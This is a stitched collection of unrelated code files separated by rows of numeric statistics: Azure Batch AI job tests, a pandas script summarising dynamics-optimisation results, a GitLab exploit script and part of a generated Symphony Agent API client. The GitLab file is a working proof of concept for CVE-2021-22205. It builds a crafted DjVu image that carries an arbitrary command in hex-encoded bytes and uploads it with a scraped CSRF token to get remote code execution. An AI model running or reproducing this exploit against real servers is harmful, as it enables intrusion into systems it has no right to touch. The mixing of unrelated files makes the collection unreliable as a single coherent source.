@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer()
def test_job_container_preparation_failure_reporting(self, resource_group, location, cluster):
"""Tests if job preparation failure is reported correctly."""
# create a job with failing job preparation
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 1, 'true',
'false',
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.failed)
job = self.client.jobs.get(resource_group.name, job.name)
self.assertEqual(job.execution_info.exit_code, 1)
self.assertEqual(len(job.execution_info.errors), 1)
self.assertEqual(job.execution_info.errors[0].code, 'JobNodePreparationFailed')
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=2)
def test_password_less_ssh(self, resource_group, location, cluster):
"""Tests if password-less ssh is configured on hosts."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 2,
'ssh 10.0.0.4 echo done && ssh 10.0.0.5 echo done')
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
job = self.client.jobs.get(resource_group.name, job.name)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'done\ndone\n',
u'stderr.txt': re.compile('Permanently added.*')})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
@ResourceGroupPreparer(location=helpers.LOCATION)
@StorageAccountPreparer(name_prefix='psdk', location=helpers.LOCATION, playback_fake_resource=helpers.FAKE_STORAGE)
@helpers.ClusterPreparer(target_nodes=2)
def test_password_less_ssh_in_container(self, resource_group, location, cluster):
"""Tests if password-less ssh is configured in containers."""
job = helpers.create_custom_job(self.client, resource_group.name, location, cluster.id, 'job', 2,
'ssh 10.0.0.5 echo done && ssh 10.0.0.5 echo done',
container=models.ContainerSettings(models.ImageSourceRegistry('ubuntu')))
self.assertEqual(
helpers.wait_for_job_completion(self.is_live, self.client, resource_group.name, job.name,
helpers.MINUTE),
models.ExecutionState.succeeded)
job = self.client.jobs.get(resource_group.name, job.name)
helpers.assert_job_files_are(self, self.client, resource_group.name, job.name, 'stdouterr',
{u'stdout.txt': u'done\ndone\n',
u'stderr.txt': re.compile('Permanently added.*')})
self.client.jobs.delete(resource_group.name, job.name).result()
self.assertRaises(CloudError, lambda: self.client.jobs.get(resource_group.name, job.name))
| 61.854406
| 119
| 0.663404
| 1,838
| 16,144
| 5.651251
| 0.102285
| 0.092616
| 0.101473
| 0.096274
| 0.893617
| 0.892462
| 0.892462
| 0.881968
| 0.881968
| 0.872437
| 0
| 0.004151
| 0.224046
| 16,144
| 260
| 120
| 62.092308
| 0.825018
| 0.090374
| 0
| 0.80198
| 0
| 0.009901
| 0.061062
| 0.01465
| 0
| 0
| 0
| 0
| 0.19802
| 1
| 0.064356
| false
| 0.009901
| 0.034653
| 0
| 0.10396
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07280c2f21807e863415e49414e2bf8f0d3efcdd
| 8,485
|
py
|
Python
|
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | null | null | null |
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | null | null | null |
analyses/analyse_text_info.py
|
Ipuch/OnDynamicsForSommersaults
|
8c60eb13b2650694212d5c8ca679894bb12c4611
|
[
"MIT"
] | 1
|
2022-01-11T19:20:38.000Z
|
2022-01-11T19:20:38.000Z
|
"""
This script is used to print out information about the main results comparing the different dynamics.
It requires the dataframe of all results to run the script.
"""
import pandas as pd
df_results = pd.read_pickle("Dataframe_results_metrics_5.pkl")
# Did everything converged ?
a = len(df_results[df_results["status"] == 1])
print(f"{a} of the trials did not converge to an optimal solutions")
dyn = df_results["dynamics_type_label"].unique()
dyn = dyn[[0, 3, 2, 5, 1, 4]]
for d in dyn:
print(d)
a = len(df_results[(df_results["status"] == 1) & (df_results["dynamics_type_label"] == d)])
print(f"{a} of the trials with {d} did not converge to an optimal solutions")
# select only the one who converged
df_results = df_results[df_results["status"] == 0]
# only the one that were in the main cluster
df_sub = df_results[df_results["main_cluster"] == True]
# Clusters
print("The number of optimal cost in the main cluster were respectively")
for ii, d in enumerate(dyn):
df_sub_sub = df_sub[df_sub["dynamics_type_label"] == d]
print(f"{df_sub_sub.__len__()}")
print("for explicit{}, rootexplicit{}, implicit{}, rootimplicit{}, implicitqdddot{} " "and rootimplicitqdddot{}. ")
# Costs
print("The average cost were")
for ii, d in enumerate(dyn):
c_mean = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].mean(), 1)
c_std = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{c_mean} $\pm$ {c_std} min, ")
c_median = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["cost_J"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max})")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(
"for \explicit{}, \rootexplicit{}, \implicit{}, \rootimplicit{}, \implicitqdddot{} "
"and \rootimplicitqdddot{} respectively (Fig.~\ref{fig:cost}). "
)
# Time and iterations
print(
"For Full-Exp, Base-Exp, Full-Imp-$\qddot$, and Base-Imp-$\qddot$, Full-Imp-$\qdddot$, and Base-Imp-$\qdddot$, respectively"
" the time (and iterations) required to converge"
" were in average "
)
for ii, d in enumerate(dyn):
t_mean = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].mean() / 60, 1)
t_std = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].std() / 60, 1)
iter = int(df_results["iterations"][df_results["dynamics_type_label"] == d].mean() / 60)
print(f"{t_mean} $\pm$ {t_std} min, ")
c_median = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].median() / 60, 2)
c_first_quartile = round(
df_results["computation_time"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0] / 60, 2
)
c_second_quartile = round(
df_results["computation_time"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0] / 60, 2
)
c_min = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].min() / 60, 2)
c_max = round(df_results["computation_time"][df_results["dynamics_type_label"] == d].max() / 60, 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) min")
print(f"IC : {c_second_quartile - c_first_quartile}")
# iterations
print(
"For Full-Exp, Base-Exp, Full-Imp-$\qddot$, and Base-Imp-$\qddot$, Full-Imp-$\qdddot$, and Base-Imp-$\qdddot$, respectively"
" the iterations"
" were in average "
)
for ii, d in enumerate(dyn):
t_mean = round(df_results["iterations"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["iterations"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{int(t_mean)} $\pm$ {int(t_std)}, ")
# Torque residuals
print("While implicit transcriptions were not consistent,")
print("Translation torque residuals respectively reached")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["int_T"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["int_T"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{t_mean} $\pm$ {t_std} \si{{N.s}}, ")
c_median = round(df_results["int_T"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["int_T"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["int_T"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["int_T"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["int_T"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("Rotation torque residuals respectively reached")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["int_R"][df_results["dynamics_type_label"] == d].mean(), 1)
t_std = round(df_results["int_R"][df_results["dynamics_type_label"] == d].std(), 1)
print(f"{t_mean} $\pm$ {t_std} \si{{N.m.s}}, ")
c_median = round(df_results["int_R"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(df_results["int_R"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2)
c_second_quartile = round(df_results["int_R"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2)
c_min = round(df_results["int_R"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["int_R"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("It lead to RMSe in linear momentum of")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].mean(), 2)
t_std = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].std(), 2)
print(f"{t_mean} $\pm$ {t_std} \si{{kg.m^2.s}}, ")
c_median = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(
df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2
)
c_second_quartile = round(
df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2
)
c_min = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["linear_momentum_rmse"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
print("And it lead to RMSe in angular momentum of")
for ii, d in enumerate(dyn[2:]):
t_mean = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].mean(), 2)
t_std = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].std(), 2)
print(f"{t_mean} $\pm$ {t_std} \si{{kg.m.s^{{-1}} }}, ")
c_median = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].median(), 2)
c_first_quartile = round(
df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.25]).iloc[0], 2
)
c_second_quartile = round(
df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].quantile([0.75]).iloc[0], 2
)
c_min = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].min(), 2)
c_max = round(df_results["angular_momentum_rmse"][df_results["dynamics_type_label"] == d].max(), 2)
print(f"{c_median} ({c_first_quartile} - {c_second_quartile}, {c_min} - {c_max}) \si{{N.s}}")
print(f"IC : {c_second_quartile - c_first_quartile}")
print(".")
| 58.116438
| 128
| 0.682145
| 1,336
| 8,485
| 4.028443
| 0.099551
| 0.170569
| 0.151617
| 0.183389
| 0.863991
| 0.847454
| 0.819584
| 0.79097
| 0.777778
| 0.740988
| 0
| 0.016791
| 0.129641
| 8,485
| 145
| 129
| 58.517241
| 0.711984
| 0.038774
| 0
| 0.282258
| 0
| 0.056452
| 0.435696
| 0.032428
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008065
| 0
| 0.008065
| 0.306452
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab12c5b54bd63c899fff44be60b86ef9c42461f7
| 3,325
|
py
|
Python
|
gitlab/CVE-2021-22205/poc.py
|
arniebilloo/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
gitlab/CVE-2021-22205/poc.py
|
starkxun/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 1
|
2022-03-14T06:07:39.000Z
|
2022-03-14T15:52:22.000Z
|
gitlab/CVE-2021-22205/poc.py
|
starkxun/vulhub
|
e5c1b204a6bf1e27d654569ec963329486f230e6
|
[
"MIT"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
import sys
import re
import requests
target = sys.argv[1]
command = sys.argv[2]
session = requests.session()
CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')
prepend = b'\x41\x54\x26\x54\x46\x4F\x52\x4D\x00\x00\x03\xAF\x44\x4A\x56\x4D\x44\x49\x52\x4D\x00\x00\x00\x2E\x81\x00\x02\x00\x00\x00\x46\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99\x20\x21\xC8\x91\x4E\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8\x6B\xE6\x44\x0F\x2C\x71\x02\xEE\x49\xD3\x6E\x95\xBD\xA2\xC3\x22\x3F\x46\x4F\x52\x4D\x00\x00\x00\x5E\x44\x4A\x56\x55\x49\x4E\x46\x4F\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00\x64\x00\x16\x00\x49\x4E\x43\x4C\x00\x00\x00\x0F\x73\x68\x61\x72\x65\x64\x5F\x61\x6E\x6E\x6F\x2E\x69\x66\x66\x00\x42\x47\x34\x34\x00\x00\x00\x11\x00\x4A\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB1\x37\xD9\x7F\x2A\x89\x00\x42\x47\x34\x34\x00\x00\x00\x04\x01\x0F\xF9\x9F\x42\x47\x34\x34\x00\x00\x00\x02\x02\x0A\x46\x4F\x52\x4D\x00\x00\x03\x07\x44\x4A\x56\x49\x41\x4E\x54\x61\x00\x00\x01\x50\x28\x6D\x65\x74\x61\x64\x61\x74\x61\x0A\x09\x28\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5C\x0A\x22\x20\x2E\x20\x71\x78\x7B'
append = b'\x7D\x20\x2E\x20\x5C\x0A\x22\x20\x62\x20\x22\x29\x20\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0A'
def csrf_token():
response = session.get(f'{target}/users/sign_in', headers={'Origin': target})
g = CSRF_PATTERN.search(response.content)
assert g, 'No CSRF Token found'
return g.group(1).decode()
def exploit():
files = [('file', ('test.jpg', prepend + command.encode() + append, 'image/jpeg'))]
session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()})
if __name__ == '__main__':
exploit()
print('finish test')
| 110.833333
| 1,756
| 0.730226
| 753
| 3,325
| 3.207171
| 0.199203
| 1.043478
| 1.561491
| 2.077019
| 0.583851
| 0.576398
| 0.568944
| 0.542857
| 0.522981
| 0.522981
| 0
| 0.385141
| 0.032481
| 3,325
| 29
| 1,757
| 114.655172
| 0.365558
| 0
| 0
| 0
| 0
| 0.1
| 0.839399
| 0.806917
| 0
| 1
| 0
| 0
| 0.05
| 1
| 0.1
| false
| 0
| 0.15
| 0
| 0.3
| 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
db4dc40da743e3db93069f1b18c7cc77395376a5
| 54,821
|
py
|
Python
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 17
|
2018-09-06T09:58:18.000Z
|
2021-07-13T12:54:20.000Z
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 59
|
2018-11-21T15:17:57.000Z
|
2021-08-03T10:00:43.000Z
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 37
|
2018-09-01T03:07:48.000Z
|
2021-07-06T10:21:50.000Z
|
"""
Agent API
This document refers to Symphony API calls to send and receive messages and content. They need the on-premise Agent installed to perform decryption/encryption of content. - sessionToken and keyManagerToken can be obtained by calling the authenticationAPI on the symphony back end and the key manager respectively. Refer to the methods described in authenticatorAPI.yaml. - Actions are defined to be atomic, ie will succeed in their entirety or fail and have changed nothing. - If it returns a 40X status then it will have sent no message to any stream even if a request to aome subset of the requested streams would have succeeded. - If this contract cannot be met for any reason then this is an error and the response code will be 50X. - MessageML is a markup language for messages. See reference here: https://rest-api.symphony.com/docs/messagemlv2 - **Real Time Events**: The following events are returned when reading from a real time messages and events stream (\"datafeed\"). These events will be returned for datafeeds created with the v5 endpoints. To know more about the endpoints, refer to Create Messages/Events Stream and Read Messages/Events Stream. Unless otherwise specified, all events were added in 1.46. # noqa: E501
The version of the OpenAPI document: 20.13.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from symphony.bdk.gen.api_client import ApiClient, Endpoint as _Endpoint
from symphony.bdk.gen.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from symphony.bdk.gen.agent_model.message_search_query import MessageSearchQuery
from symphony.bdk.gen.agent_model.v2_error import V2Error
from symphony.bdk.gen.agent_model.v4_import_response_list import V4ImportResponseList
from symphony.bdk.gen.agent_model.v4_message import V4Message
from symphony.bdk.gen.agent_model.v4_message_blast_response import V4MessageBlastResponse
from symphony.bdk.gen.agent_model.v4_message_import_list import V4MessageImportList
from symphony.bdk.gen.agent_model.v4_message_list import V4MessageList
class MessagesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __v1_message_id_get(
self,
session_token,
key_manager_token,
id,
**kwargs
):
"""Get a message by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v1_message_id_get(session_token, key_manager_token, id, async_req=True)
>>> result = thread.get()
Args:
session_token (str): Session authentication token.
key_manager_token (str): Key Manager authentication token.
id (str): Message ID as a URL-safe string
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4Message
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['session_token'] = \
session_token
kwargs['key_manager_token'] = \
key_manager_token
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.v1_message_id_get = _Endpoint(
settings={
'response_type': (V4Message,),
'auth': [],
'endpoint_path': '/v1/message/{id}',
'operation_id': 'v1_message_id_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'session_token',
'key_manager_token',
'id',
],
'required': [
'session_token',
'key_manager_token',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'session_token':
(str,),
'key_manager_token':
(str,),
'id':
(str,),
},
'attribute_map': {
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'id': 'id',
},
'location_map': {
'session_token': 'header',
'key_manager_token': 'header',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__v1_message_id_get
)
def __v1_message_search_get(
self,
query,
session_token,
key_manager_token,
**kwargs
):
"""Search messages # noqa: E501
Search messages according to the specified criteria. The \"query\" parameter takes a search query defined as \"field:value\" pairs combined by the operator \"AND\" (e.g. \"text:foo AND autor:bar\"). Supported fields are (case-insensitive): \"text\", \"author\", \"hashtag\", \"cashtag\", \"mention\", \"signal\", \"fromDate\", \"toDate\", \"streamId\", \"streamType\". \"text\" search requires a \"streamId\" to be specified. \"streamType\" accepts one of the following values: \"chat\" (IMs and MIMs), \"im\", \"mim\", \"chatroom\", \"post\". \"signal\" queries can only be combined with \"fromDate\", \"toDate\", \"skip\" and \"limit\" parameters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v1_message_search_get(query, session_token, key_manager_token, async_req=True)
>>> result = thread.get()
Args:
query (str): The search query. See above for the query syntax.
session_token (str): Session authentication token.
key_manager_token (str): Key Manager authentication token.
Keyword Args:
skip (int): No. of results to skip. . [optional]
limit (int): Max no. of results to return. If no value is provided, 50 is the default. . [optional]
scope (str): Describes where content should be searched for that query. It can exclusively apply to Symphony content or to one Connector. . [optional]
sort_dir (str): Messages sort direction : ASC or DESC (default to DESC) . [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4MessageList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['query'] = \
query
kwargs['session_token'] = \
session_token
kwargs['key_manager_token'] = \
key_manager_token
return self.call_with_http_info(**kwargs)
self.v1_message_search_get = _Endpoint(
settings={
'response_type': (V4MessageList,),
'auth': [],
'endpoint_path': '/v1/message/search',
'operation_id': 'v1_message_search_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'query',
'session_token',
'key_manager_token',
'skip',
'limit',
'scope',
'sort_dir',
],
'required': [
'query',
'session_token',
'key_manager_token',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'query':
(str,),
'session_token':
(str,),
'key_manager_token':
(str,),
'skip':
(int,),
'limit':
(int,),
'scope':
(str,),
'sort_dir':
(str,),
},
'attribute_map': {
'query': 'query',
'session_token': 'sessionToken',
'key_manager_token': 'keyManagerToken',
'skip': 'skip',
'limit': 'limit',
'scope': 'scope',
'sort_dir': 'sortDir',
},
'location_map': {
'query': 'query',
'session_token': 'header',
'key_manager_token': 'header',
'skip': 'query',
'limit': 'query',
'scope': 'query',
'sort_dir': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__v1_message_search_get
)
def __v1_message_search_post(
self,
session_token,
key_manager_token,
query,
**kwargs
):
"""Search messages # noqa: E501
Search messages according to the specified criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = agent_api.v1_message_search_post(session_token, key_manager_token, query, async_req=True)
>>> result = thread.get()
Args:
session_token (str): Session authentication token.
key_manager_token (str): Key Manager authentication token.
query (MessageSearchQuery): The search query. See above for the query syntax.
Keyword Args:
skip (int): No. of results to skip. . [optional]
limit (int): Max no. of results to return. If no value is provided, 50 is the default. . [optional]
scope (str): Describes where content should be searched for that query. It can exclusively apply to Symphony content or to one Connector. . [optional]
sort_dir (str): Messages sort direction : ASC or DESC (default to DESC) . [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V4MessageList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['session_token'] = \
session_token
kwargs['key_manager_token'] = \
key_manager_token
kwargs['query'] = \
query
return self.call_with_http_info(**kwargs)
